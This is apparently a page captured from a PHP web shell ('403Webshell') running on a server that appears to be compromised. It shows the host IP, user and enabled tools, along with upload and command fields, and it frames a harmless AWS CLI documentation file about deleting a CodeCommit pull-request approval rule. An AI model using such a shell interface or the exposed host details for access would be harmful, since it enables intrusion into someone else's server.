403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.229
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-190-generic #200-Ubuntu SMP Fri Aug 7 15:06:04 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/awscli/examples/codecommit/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /lib/python3/dist-packages/awscli/examples/codecommit/delete-pull-request-approval-rule.rst
**To delete an approval rule for a pull request**

The following ``delete-pull-request-approval-rule`` example deletes the approval rule named  ``My Approval Rule`` for the specified pull request. ::

    aws codecommit delete-pull-request-approval-rule  \
        --approval-rule-name "My Approval Rule"  \
        --pull-request-id 15

Output::

    {
        "approvalRuleId": "077d8e8a8-EXAMPLE"
    }

For more information, see `Edit or Delete an Approval Rule  <https://docs.aws.amazon.com/codecommit/latest/userguide/how-to-edit-delete-pull-request-approval-rule.html#delete-pull-request-approval-rule>`__ in the *AWS CodeCommit User Guide*.

Youez - 2016 - github.com/yon3zu
LinuXploit